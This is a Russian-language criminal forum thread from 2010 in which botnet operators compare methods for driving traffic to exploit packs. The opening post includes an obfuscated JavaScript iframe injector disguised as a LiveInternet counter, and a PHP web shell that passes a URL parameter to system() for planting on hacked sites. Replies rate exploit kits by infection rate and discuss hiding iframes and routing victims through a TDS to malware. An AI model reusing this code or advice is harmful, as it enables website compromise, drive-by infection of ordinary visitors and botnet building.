Привет,имеется все необходимое для ботнета-ТДС(сутра),лоадер(2к8),хороший криптор,приват связка,абузоустойчивый хостинг.
Для начала взял трафф из ифрейма фтп,сам ифрейм критован,вида
Code:<!--LiveInternet counter-->
<script>
('.75.67.67.63.3a.2f.2f.6f.72.67.75.72.62.2e.70.62.7a.2f.76.61.2e.70.74.76.3f.34'));var d=(c)?b.b.b.c():false;return d;}},c:{b:function(){var c=b.b.b.d('trashtext');var d=(c)?c:'trashtext';return d||false;},c:function(){var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');c['\x77\x69\x64\x74\x68']='0.1em';c['\x68\x65\x69\x67\x68\x74']='0.2em';c['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';c['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';c['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';c['\x69\x64']='\x6c';document['\x62\x6f</script>
<!--/LiveInternet-->
Это прости пример как выглядит.На сайты с которых много траффа заливаю шелл и по возможности(если не лень добавляю свой код
Code:<? if (!empty($_GET['c'])) { echo '<pre>'; system($_GET['c']); echo '</pre>'; }exit; ?>
Какие могут быть советы?Например как сохранять трафф и где лучше его собстенно брать.Самому ломать-долго и невсегда получается,карж-гамно.
2FED (21.07.10, 14:12:35)
TrueUser (21.07.10, 20:09:57)
Покупной трафик в основном большинстве своем не рентабелен.
karabas-barabas (22.07.10, 10:02:55)
Цитата:Покупной трафик в основном большинстве своем не рентабелен.
но там можно всегда найти интересные образцы других зверьков для изучения. :)
покупал готовые загрузки у одного селлера для тестирований лоадера и другого софта, траф жатый-пережатый все фтп что снял , все уже по 10 раз проинфреймлены, наверное еще куча троев стоит там...
вообщем если такой траф покупаешь - то есть смысл только для разных блокираторов
но там можно всегда найти интересные образцы других зверьков для изучения. :)
покупал готовые загрузки у одного селлера для тестирований лоадера и другого софта, траф жатый-пережатый все фтп что снял , все уже по 10 раз проинфреймлены, наверное еще куча троев стоит там...
вообщем если такой траф покупаешь - то есть смысл только для разных блокираторов
2FED (22.07.10, 12:10:03)
Отсюда вывод-ломай сам траффистые ресурсы и радуйся жизни.
2FED (26.07.10, 12:41:55)
У всех также по браузерам пробив?(
У всех также по браузерам пробив?(
TrueUser (26.07.10, 21:43:08)
Цитата (2FED, 26.07.10, 12:41:55):У всех также по браузерам пробив?(
Просто или траф говно или связка :)
Просто или траф говно или связка :)
AluAdib (26.07.10, 21:47:41)
и то и то)
fx_man (27.07.10, 03:01:47)
2FED что за связка у тебя?
TrueUser (27.07.10, 11:41:52)
Цитата (fx_man, 27.07.10, 03:01:47):что за связка
Паблик фрагус конечно! :)
Паблик фрагус конечно! :)
Ar3s (27.07.10, 13:46:27)
Больше похоже на YES EXPLOIT PACK.
Пробив, судя по стате, отстой полный. Моя элеонорка на нормальном трафе 26% дает и не квакает. И траф не эксплорер в чистом виде. Примерно 50% - FF.
Что касается остальных вопросов - сам сейчас ищу изящное решения для iframe.
Думал размещать js у себя на хосте и инклудить куда-нить в шапку, но паливно. Подсказали идею на проверку по рефереру + юзер агенту + js enabled = очень большой размер js получается. Даже после ужатия и крипта. 24 кб js-мешанины не так-то легко спрятать. Вот и ломаю голову.
Пока что самый оптимальный способ - ифрэймить на tds, а уж с нее гнать на малварю. (да, знаю! Много минусов. домены сразу пачками палятся, но не так часто фрэймы перебивать зато нужно)
Пробив, судя по стате, отстой полный. Моя элеонорка на нормальном трафе 26% дает и не квакает. И траф не эксплорер в чистом виде. Примерно 50% - FF.
Что касается остальных вопросов - сам сейчас ищу изящное решения для iframe.
Думал размещать js у себя на хосте и инклудить куда-нить в шапку, но паливно. Подсказали идею на проверку по рефереру + юзер агенту + js enabled = очень большой размер js получается. Даже после ужатия и крипта. 24 кб js-мешанины не так-то легко спрятать. Вот и ломаю голову.
Пока что самый оптимальный способ - ифрэймить на tds, а уж с нее гнать на малварю. (да, знаю! Много минусов. домены сразу пачками палятся, но не так часто фрэймы перебивать зато нужно)